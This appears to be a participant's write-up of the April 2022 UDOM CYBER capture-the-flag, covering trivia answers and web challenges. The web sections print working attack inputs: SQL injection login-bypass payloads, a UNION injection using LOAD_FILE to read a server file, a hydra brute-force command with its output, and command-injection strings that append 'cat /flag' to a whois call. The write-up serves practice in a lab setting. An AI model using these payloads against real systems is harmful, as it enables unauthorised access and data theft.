# UDOM CYBER CTF APRIL 2022 WRITEUP #### username: `Hashghost` [ToC] > This ctf was created and hosted by UDOM CYBER leaders for the purpose of improving knowledge. > If you want to check click [udom](http://129.80.41.223/challenges). > It invlolved different categories such as follows: >- General Information >- Web Lets roll to the challenges. -- CHAR CHALLENGE. --  **Solution** I though maybe it can a letter like **e** but i realized it is symbol (character) . **Flag**: **UDOM{'}** -- - NEW CHALLENGE. --  The first thing came up on my mind was to check on [OWASPTop10](https://owasp.org/Top10/) website for 2021. **Flag:** **UDOM{SSRF}** -- - SQL CHALLENGE. --  All i know SQL is structured database and database use queries. :smile: then, **Flag:** **UDOM{STRUCTURED_QUERY_LANGUAGE}** -- - YEAR CHALLENGE. --  Google is my friend so i jus googled it. **Flag:** **UDOM{1998}** -- - ORG CHALLENGE. --  If you got on ```new challenge``` then this one was similar to that. **Flag:** **UDOM{OWASP}** -- - TOOL CHALLENGE. --  If you are kali linux or parrot user i gues this was piece of cake. **Flag:** **UDOM{sqlmap}** -- - CVE CHALLENGE. --  CVE stands for Common Vulnerabilty Exposure, is a list of publicly disclosed computer security flaws. When someone refers to a CVE, they mean a security flaw that's been assigned a CVE ID number. **Flag** **UDOM{Blazer}** -- - ERRRor CHALLENGE. --  This challenge mocked us with error hint meaning that our flag might have beeen on the error. I used the payload ```' or 1=1-- - ``` and then error with flag poped up but it wasn't a real flag so i tried another method which is ``` ' 1 or 1=1-- -``` and i was succefully bypassed the login page.  After loging in this was **Flag**  -- -- BYPASS LOGIN CHALLENGE. --  So this was error based sql injection but on instruction challenge but it was written as login challenge. I used the payload ``` ' or 1=1-- -``` and i got the pop-up which had a flag.  **Flag is located on the right hand side of the web page** -- - BRUTEFORCE CHALLENGE --  Since the question says about ```admin``` then thats a user of the web page. I used burp suite to solve the challenge and letter on i used interesting tool called hydra. :::info **Burp suit.** ::: **I will show some few steps here because i believe you are able to start,capture,intercept on burpsuite.** **Login page to brute froce.**  **Capture request from the web page and sent it to intruder.**  **Clear all unnecessary and leave only required parts, for our case we need to bruteforce password field.**  **Load the password file and start the attack.**  **Once it finishes, filter with a common error. In our case the common error for all unsuccessful login was** ```LOGIN FAILED```  **Select Negative search to allow burp to filter pages and return those with no ```LOGIN FAILED``` Error message.**  **By doing so we get request number 501 has what we need and the passowrd is** ```chocolatelimao```  **Login to get flag.**  :::info Using command line tool **hydra** . ::: ``` ┌──(gemstone㉿kali)-[~] └─$ hydra -l admin -P ~/Downloads/passlist\(1\).txt 129.80.41.223 -s 8889 http-post-form "/:username=^USER^&password=^PASS^&submit=submit:F=LOGIN FAILED" -V -I Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-23 04:00:40 [DATA] max 16 tasks per 1 server, overall 16 tasks, 1284 login tries (l:1/p:1284), ~81 tries per task [DATA] attacking http-post-form://129.80.41.223:8889/:username=^USER^&password=^PASS^&submit=submit:F=LOGIN FAILED [ATTEMPT] target 129.80.41.223 - login "admin" - pass "chocolate!1" - 1 of 1284 [child 0] (0/0) [ATTEMPT] target 129.80.41.223 - login "admin" - pass "chocolate!%!$" - 2 of 1284 [child 1] (0/0) [ATTEMPT] target 129.80.41.223 - login "admin" - pass "cafeconchocolate" - 3 of 1284 [child 2] (0/0) [ATTEMPT] target 129.80.41.223 - login "admin" - pass "chocolatelove1" - 495 of 1284 [child 5] (0/0) [ATTEMPT] target 129.80.41.223 - login "admin" - pass "chocolatelova4lyf" - 496 of 1284 [child 9] (0/0) [ATTEMPT] target 129.80.41.223 - login "admin" - pass "chocolatelol" - 497 of 1284 [child 13] (0/0) [ATTEMPT] target 129.80.41.223 - login "admin" - pass "chocolateloki4854581" - 498 of 1284 [child 6] (0/0) [ATTEMPT] target 129.80.41.223 - login "admin" - pass "chocolatelog" - 499 of 1284 [child 1] (0/0) [ATTEMPT] target 129.80.41.223 - login "admin" - pass "chocolatelipz" - 500 of 1284 [child 11] (0/0) [ATTEMPT] target 129.80.41.223 - login "admin" - pass "chocolatelimao" - 501 of 1284 [child 15] (0/0) [ATTEMPT] target 129.80.41.223 - login "admin" - pass "chocolatekissess" - 509 of 1284 [child 2] (0/0) [ATTEMPT] target 129.80.41.223 - login "admin" - pass "chocolatekiss8-21" - 510 of 1284 [child 14] (0/0) [ATTEMPT] target 129.80.41.223 - login "admin" - pass "chocolateking" - 511 of 1284 [child 5] (0/0) [ATTEMPT] target 129.80.41.223 - login "admin" - pass "chocolatekik" - 512 of 1284 [child 9] (0/0) [ATTEMPT] target 129.80.41.223 - login "admin" - pass "chocolatekatie" - 513 of 1284 [child 6] (0/0) [ATTEMPT] target 129.80.41.223 - login "admin" - pass "chocolatekathy" - 514 of 1284 [child 1] (0/0) [ATTEMPT] target 129.80.41.223 - login "admin" - pass "chocolatekate" - 515 of 1284 [child 13] (0/0) [ATTEMPT] target 129.80.41.223 - login "admin" - pass "chocolatejj" - 516 of 1284 [child 0] (0/0) [ATTEMPT] target 129.80.41.223 - login "admin" - pass "chocolatejeremy" - 517 of 1284 [child 11] (0/0) [8889][http-post-form] host: 129.80.41.223 login: admin password: chocolatelimao 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-23 04:01:28 ``` **Password found on [8889] password:==```chocolatelimao```==** -- - SQL LOGIC CHALLENGE. --  This question aimed to challenge users understanding on basic concept of the UNION based SQL injection. As the question stated itself there was an injection in the age field and database had 5 columns. I used some of internet resources and came to realise that, inorder to read files on SQL, then LOAD_FILE() function is used. For more information you can visit [VK9Security](https://vk9-sec.com/advanced-sql-injection-union-based/) or you can download this [pdf](https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjE86eV86z3AhWbQkEAHYqNC4sQFnoECA8QAQ&url=https%3A%2F%2Fwww.blackhat.com%2Fpresentations%2Fbh-europe-09%2FGuimaraes%2FBlackhat-europe-09-Damele-SQLInjection-slides.pdf&usg=AOvVaw0ke74DnHmvESOU8jgz3ygC). On our question the important thing was to know where injection is, and it is in 3rd column named as ```age```. Then required format was ```UDOM{'UNIONSELECT1,2,LOADFILE("/tmp/security.txt"),4,5;---}``` :::info Note: Before UNION there is **'** then inorder to avoid error then use **""** where you want to read. ::: -- - COMMAND 1 CHALLENGE. --  If you know command injection then this was simple task all you had was to think out of the box. Question says ping or whois i don't know meaning you can execute more than one command by using **==```;```==** then i decided to use whois command. ```whois -h 129.80.41.223:8890; ls -l;``` and it output the following:  This was good start and as long as the question says get /flag then this must be stored in root directory and file named flag, so i decided to use another command. ```whois -h 129.80.41.223:8890; cat /flag;``` then i was able to see the flag  **The End**. -- - Thanks for reading you can check me on [twitter](https://twitter.com/hashghost101) or through my email sophiajulius5@gmail.com. You can also imporove your knowledge by reading from my bothers [blackninja23](https://blackninja23.github.io/Urchinbank/), [malware](https://hackmd.io/@malwarepeter/r1-7i7f-q) and [peterchain](https://peterchain7.github.i/penetrationtesting/). -- -